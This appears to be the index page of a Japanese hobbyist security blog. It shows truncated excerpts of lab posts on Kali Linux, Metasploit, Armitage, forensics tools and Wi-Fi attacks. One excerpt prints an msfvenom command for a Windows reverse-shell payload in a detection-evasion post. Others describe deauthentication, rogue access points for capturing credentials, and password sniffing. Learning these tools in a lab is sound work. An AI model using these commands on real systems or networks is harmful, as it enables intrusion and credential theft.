Shikata Ga Nai

Private? There is no such things.

Kali Linux

Hash値によるupdateエラーについて対応してみた

Hello there, ('ω')ノ Kali Linuxをアップデートしようとすると下記のようなエラーが。 どうやらハッシュ値が異なるようで。 対応するのが面倒だったので、他に仮想環境を構築してみることに。 それでも同じエラーが。 Parott Securityでも同じエラーが。 た…

ファイルの回復とデータのカービング用にForemostをインストールしてみた

Hello there, ('ω')ノ デジタルフォレンジックツールでデータをテストするために。 NickMikusの作成したイメージを利用することができて。 http://dftt.sourceforge.net/test11/index.html 他には下記のサイトにも。 http://dftt.sourceforge.net/ さらには…

フォレンジック取得のデータダンプにふれてみた

Hello there, ('ω')ノ フォレンジック取得とハッシュに使用されるツールで。 国防総省サイバー犯罪センターのデータダンプ(dc3dd)があって。 dc3ddは、データダンプ(DD)ツールのパッチで。 なので、DDが更新されるたびに定期的に更新されて。 他のツール…

基礎レベルで脅威検出システムを回避するための手法をためしてみた

Hello there, ('ω')ノ まずは、攻撃者となるKali LinuxのIPアドレスの確認から。 今回は、Windowsのリバースシェルペイロードを作成することに。 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.24 LPORT=4444 -f exe -o payload.exe 作成し…

AWS S3バケットをスキャンしてみた

Hello there, ('ω')ノ まずは、AWS S3バケットをスキャンするツールのインストールから。 sudo pip3 install s3scanner AWSのコマンドライン機能の設定を。 aws configure aws configureaws /home/kali/Pictures/Screenshot_2022-0 Webサイトのホスティング…

USBで起動するKali Linuxの構築方法についてかいてみた(ブラッシュアップ版)

Hello there, ('ω')ノ 今回は、KingstonのUSBで。 USBは、256GBのGen2対応を。 Kali LinuxのLive USBの作る際には。 下記よりliveバージョンをダウンロードしてから。 ダウンロードがなかなかできないときは、アーカイブサイトからダウンロードして。 https:…

KaliのターミナルをParrot風に変えてみた

Hello there, ('ω')ノ Parrotのターミナルが気になったので、Kaliでもと。 まずは、下記へアクセスして、ファイルをダウンロードして。 bit.ly/kali-theme 現在の.bashrcの名前を.bashrc_oldに変更してから。 ダウンロードしたファイルを移動させて.bashrcへ…

Kali LinuxにDockerをインストールしてみた

Hello there, ('ω')ノ まずは、おきまりのapt updateをしてから。 公式のDocker PGPキーを追加して。 次にaptを構成して、Dockerをダウンロード、インストール、更新できるようにして。 Dockerをaptに追加したら、aptをもう一度更新しておいて。 apt update …

Kali Linuxにふりまわされてしまった

Hello there, ('ω')ノ 本日もKali Linuxに振り回され、やりたいことができず。 今年の春前あたりからOVAファイルを仮想環境にインポートして使い始めると。 これまでとはデフォルトのログインIDもパスワードも変更となって。 armitageもメニューから削除され…

Metasploitの使い方を実践的にやってみた

Hello there, ('ω')ノ 昨日の夕刻に国からの指摘をうけて急遽、ホームページを新規作成することに。 指摘から24時間内になんとか対応したもののすでにヘトヘト状態で。 metasploit frameworkの使い方も少しはわかったところで。 どのようなストーリーで使用…

EXPLOIT DATABASEを活用してみた

Hello there, ('ω')ノ このところ、ずっとブルースクリーンによる作業の中断が気にかかり。 おもいきってWindowsを初期化することに。 これでダメならSSDの交換までやってみようかと。 さっそく、VirtualboxをインストールしてKali LinuxのOVAファイルをイン…

postgresqlへの接続ができず原因がわからなかった

Hello there, ('ω')ノ 昨夜からドツボにはまってしまって。 msfconsoleで、postgresqlに接続できなくて。 postgresqlの状態を確認しても問題ないのですが。 msfconsoleを起動して、db_statusで確認すると下記のメッセージが。 postgresql selected no connec…

armitageをつかってエクスプロイトしてみた

Hello there, ('ω')ノ 本日は終日、ブルースクリーンの対応で。 どうしてもVirtual BoxでKali Linuxを使用していると発生して。 一度、発生すると頻繁に発生して作業が止まって。 一応、Kali Linuxの専用にPCを用意したものの仮想環境が便利な時もあってつい…

armitageのattackメニューの表示手順をかいてみた

Hello there, ('ω')ノ armitageをしばらく使っていなかったら少々仕様もかわっていて。 さらにはKali Linuxにもインストールされておらず。 起動方法も少し手間になったような。 armitageの起動前には下記のデータベースの初期化や起動が必要で。 sudo msfdb…

Armitageをつかってスキャンしてみた

Hello there, ('ω')ノ Armitageを起動する前にPostgreSQLとMetasploitを起動して。 Armitageを起動して。 インストールされていなかったので、インストールすることに。 以前は、Kali Linuxのメニューにあったような。 インストールするとメニューからも起動…

Meterpreterを体験してみた

Hello there, ('ω')ノ Meterpreterは、メモリ内DLLインジェクションを使用する拡張可能なペイロードで。 まずは、下記コマンドでLHOSTを設定してMeterpreterペイロードを構成してから。 次にms08_067_netapiで脆弱性を取得するものの。 Linux向けに実行して…

MS12_020_checkという補助モジュールをつかってみた

Hello there, ('ω')ノ Metasploit Frameworkの補助モジュールにMS12_020_checkというものがあって。 これは、下記の脆弱性に対して脆弱かどうかを確認するもので。 MS12-020: リモート デスクトップの脆弱性により、リモートでコードが実行される 危険度: :…

Metasploit FrameworkでNMAPをつかってみた

Hello there, ('ω')ノ Network Mapper(NMAP)を使うと以下のようなことができるツールで。 ホスト発見サービス バージョンの検出 列挙 脆弱性スキャン ファイアウォールのテストと回避 Metasploit Framework内でもNMAPスキャンを開始することもできて。 ス…

PostgreSQLをつかって情報を収集してみた

Hello there, ('ω')ノ Metasploit Frameworkは、デフォルトでバックエンドのPostgreSQLを使用して。 必要なすべての情報を保存および取得できて。 まずは、下記のコマンドで、Kali LinuxでPostgreSQLを開始して。 sudo service postgresql start 次に下記の…

msfcosoleのエラーに対処してみた

Hello there, ('ω')ノ ネットワークからパスワードを盗聴するpsnuffleというモジュールを実行すると。 『failed』といった嫌な文字が。 実行権限について問われているようで。 これまでのKali Linuxは、ルート権限でログインしたいたものの。 最新版ではユー…

Metasploitをつかって情報収集してみた①

Hello there, ('ω')ノ まずは、Metasploitable2を起動してIPアドレスを確認して。 Kali Linuxでmsfconsoleを起動して軽くウォーミングアップして。 tcpモジュールは、ポートスキャンを実行して開いているTCPポートを通知してくれて。 補助モジュール名:auxi…

msfconsoleのコマンドをいくつかとりあげてみた

Hello there, ('ω')ノ Metasploit Frameworkは、単なるコマンドラインインターフェイスで。 なので、コマンドラインコンソール(msfconsole)を習得する必要があって。 bannerコマンド:msf> banner Metasploitのを表示するために使用されるシンプルなコマン…

Metasploit Frameworkについてふれてみた

Hello there, ('ω')ノ Metasploit Frameworkの構造を学ぶのに簡単な方法は、閲覧して調査することで。 ということで、アプリケーションディレクトリを。 /usr/share/metasploit-framework/modules Metasploit Frameworkには、以下のカテゴリがあって。 gathe…

airgeddonでWEP攻撃をしてみた

Hello there, まずは、airgeddon.shコマンドでAirgeddonインターフェースを開始して。 wlan0インターフェースをを選択して。 ワイヤレスアダプターを監視モードに設定して。 今回は、プロトコル設計に脆弱なWEPへの攻撃を選択して。 ターゲットの探索を選択…

不正なAPを作成するAirgeddonを導入してみた

Hello there, 不正なAPを作成する目的としては。 ユーザの資格情報と機密情報を取得して。 組織内の脆弱なワイヤレスクライアントを検出することで。 そこでクライアントを実際のAPから認証解除して不正APとの関連付けを作成させて。 ユーザの資格情報を取得…

aireplay-ngで認証解除フレームを送信してみた

Hello there, ワイヤレスネットワークは、パスワードと関連付けされていて。 ユーザがパスフレーズを入力するとPCなどのデバイスはネットワーク上で認証され。 使用可能なリソースにアクセスできるようになるわけで。 そこで、認証解除攻撃を開始するには、…

airodump-ngでキャプチャしたデータを保存したみた

Hello there, 引き続き、airodump-ngの機能について。 まずは、ifconfigでアダプタの状況を確認して。 なれてきたら、いきなりプロセスを終了させて。 ワイヤレスアダプタの監視モードを有効にして。 アクセスポイントの情報を表示させて。 フィルタリングす…

airmon-ngの使い方の流れをまとめてみた

Hello there, airodump-ngは、パケットスニッフィングができて。 このツールをつかうと ワイヤレスAP 関連付けられているクライアントデバイス 関連付けられていないクライアントデバイス(ステーション) 暗号化タイプ SSID APの製造元 など が表示でき。 …

Kali LinuxにWPS Officeをインストールしてみた

Hello there, いつもマイクロソフト製品を使って頭を悩ませるのはライセンス費用であって。 さらには、Windowsの更新も面倒だったりと。 Linuxが使いやすくなってきたのでコストを抑えたいなら移行の検討もよろしいかと。 ただ、毎回悩まされるのはオフィス…

Kali Linux専用PCを購入して構築してみた

Hello there, いつも使っているLGのgramの15インチが8万円台で購入できたので。 さっそく、本体にKali Linuxをインストールすることに。 仮想上だとどちらのエラーなのかわからなかったりと無駄な時間を費やすので。 LGのgramは、BIOSでUSBからの起動を許可…